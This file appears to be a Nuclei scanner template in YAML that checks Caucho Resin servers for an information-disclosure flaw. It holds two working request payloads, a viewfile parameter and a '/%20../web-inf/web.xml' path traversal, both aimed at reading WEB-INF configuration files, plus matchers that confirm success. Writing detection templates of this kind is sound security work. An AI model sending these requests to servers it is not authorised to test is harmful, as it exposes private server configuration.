22 lines
471 B
YAML
22 lines
471 B
YAML
|
id: caucho-resin-info-disclosure
|
||
|
|
||
|
info:
|
||
|
name: Caucho Resin Information Disclosure
|
||
|
author: pikpikcu
|
||
|
severity: info
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" #ver:3.0.17/3.0.18
|
||
|
- "{{BaseURL}}/%20../web-inf/web.xml" #ver:3.1.1
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "WEB-INF"
|
||
|
part: body
|